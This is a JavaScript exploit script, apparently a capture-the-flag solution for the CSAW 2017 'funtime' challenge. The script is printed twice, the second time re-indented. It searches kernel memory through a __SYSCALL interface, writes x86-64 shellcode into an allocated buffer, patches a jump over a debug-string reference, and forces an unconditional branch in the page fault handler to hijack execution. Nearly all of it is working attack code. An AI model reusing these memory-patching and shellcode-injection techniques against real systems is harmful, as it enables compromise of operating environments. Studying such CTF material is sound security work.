csaw-2017-funtime.js

## csaw-2017-funtime.js
console.log("Starting");

function findData(lookFor) {
  var MEM_START_OFFSET = 1;
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF).buffer());
  var locs = [];
  for (var i = 0; i < 0x2000000; i++) {
    var found = true;
    for (var j = 0; j < lookFor.length; j++) {
      if (memBuffer[i+j] != lookFor[j]) {
        found = false;
        break;
      }
    }
    if (found) {
       return (i + MEM_START_OFFSET);
    }
  }
  return null;
}

function decToHex(d) {
  var hex = d.toString(16);
  hex = "00".substr(0, 2 - hex.length) + hex;
  return hex;
}

function dumpMem(start, size) {
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(start, size).buffer());
  var outStr = "";
  for (var i = 0; i < size; i++) {
    outStr += decToHex(memBuffer[i]);
  }
  return outStr;
}

function writeData(writeTo, data) {
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length).buffer());
  for (var i = 0; i < data.length; i++) {
    memBuffer[i] = data[i];
  }
}

function writeMultipleData(writeTo, datas) {
  var offset = 0;
  for (var i = 0; i < datas.length; i++) {
    writeData(writeTo + offset, datas[i]);
    offset += datas[i].length;
  }
}

function pointerToBytes(pointer) {
  var result = [];
  for (var i = 0; i < 4; i++) {
    result.push((pointer >> (i*8)) & 0xFF);
  }
  return result;
}

var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0)));
console.log("Found debug string at: ", dbgStrAddr.toString(16));

var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr));
console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16));

var codeBuf = __SYSCALL.allocDMA();
console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16));

/*
0:  48 c7 c3 00 00 e0 1c    mov    rbx,0x1ce00000
7:  ff e3                   jmp    rbx
*/
var jmpData = [
  [0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address),
  [0xff, 0xe3]
];
writeMultipleData(dbgStrUsageAddr - 5, jmpData);

/*
0:  48 83 c4 08             add    rsp,0x8
4:  48 bf ef ee be ad de    movabs rdi,0xdeadbeeeef
b:  00 00 00
e:  48 c7 c3 78 56 34 12    mov    rbx,0x12345678
15: ff e3                   jmp    rbx
*/
var shellcode = [
  [0x48, 0x83, 0xc4, 0x08],
  [0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00],
  [0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4),
  [0xff, 0xe3]
];
writeMultipleData(codeBuf.address, shellcode);

var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0)));
console.log("Found page fault string at: ", invalidStrAddr.toString(16));

var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr));
console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16));

// Set unconditional jump in page fault handler
writeData(invalidStrUsageAddr - 251, [0xEB]);

console.log("Finished writing shellcode");

__SYSCALL.debug();

console.log("Finished calling debug");
	console.log("Starting");

	function findData(lookFor) {
	var MEM_START_OFFSET = 1;
	var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF).buffer());
	var locs = [];
	for (var i = 0; i < 0x2000000; i++) {
	var found = true;
	for (var j = 0; j < lookFor.length; j++) {
	if (memBuffer[i+j] != lookFor[j]) {
	found = false;
	break;
	}
	}
	if (found) {
	return (i + MEM_START_OFFSET);
	}
	}
	return null;
	}

	function decToHex(d) {
	var hex = d.toString(16);
	hex = "00".substr(0, 2 - hex.length) + hex;
	return hex;
	}

	function dumpMem(start, size) {
	var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(start, size).buffer());
	var outStr = "";
	for (var i = 0; i < size; i++) {
	outStr += decToHex(memBuffer[i]);
	}
	return outStr;
	}

	function writeData(writeTo, data) {
	var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length).buffer());
	for (var i = 0; i < data.length; i++) {
	memBuffer[i] = data[i];
	}
	}

	function writeMultipleData(writeTo, datas) {
	var offset = 0;
	for (var i = 0; i < datas.length; i++) {
	writeData(writeTo + offset, datas[i]);
	offset += datas[i].length;
	}
	}

	function pointerToBytes(pointer) {
	var result = [];
	for (var i = 0; i < 4; i++) {
	result.push((pointer >> (i*8)) & 0xFF);
	}
	return result;
	}

	var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0)));
	console.log("Found debug string at: ", dbgStrAddr.toString(16));

	var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr));
	console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16));

	var codeBuf = __SYSCALL.allocDMA();
	console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16));

	/*
	0: 48 c7 c3 00 00 e0 1c mov rbx,0x1ce00000
	7: ff e3 jmp rbx
	*/
	var jmpData = [
	[0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address),
	[0xff, 0xe3]
	];
	writeMultipleData(dbgStrUsageAddr - 5, jmpData);

	/*
	0: 48 83 c4 08 add rsp,0x8
	4: 48 bf ef ee be ad de movabs rdi,0xdeadbeeeef
	b: 00 00 00
	e: 48 c7 c3 78 56 34 12 mov rbx,0x12345678
	15: ff e3 jmp rbx
	*/
	var shellcode = [
	[0x48, 0x83, 0xc4, 0x08],
	[0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00],
	[0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4),
	[0xff, 0xe3]
	];
	writeMultipleData(codeBuf.address, shellcode);

	var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0)));
	console.log("Found page fault string at: ", invalidStrAddr.toString(16));

	var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr));
	console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16));

	// Set unconditional jump in page fault handler
	writeData(invalidStrUsageAddr - 251, [0xEB]);

	console.log("Finished writing shellcode");

	__SYSCALL.debug();

	console.log("Finished calling debug");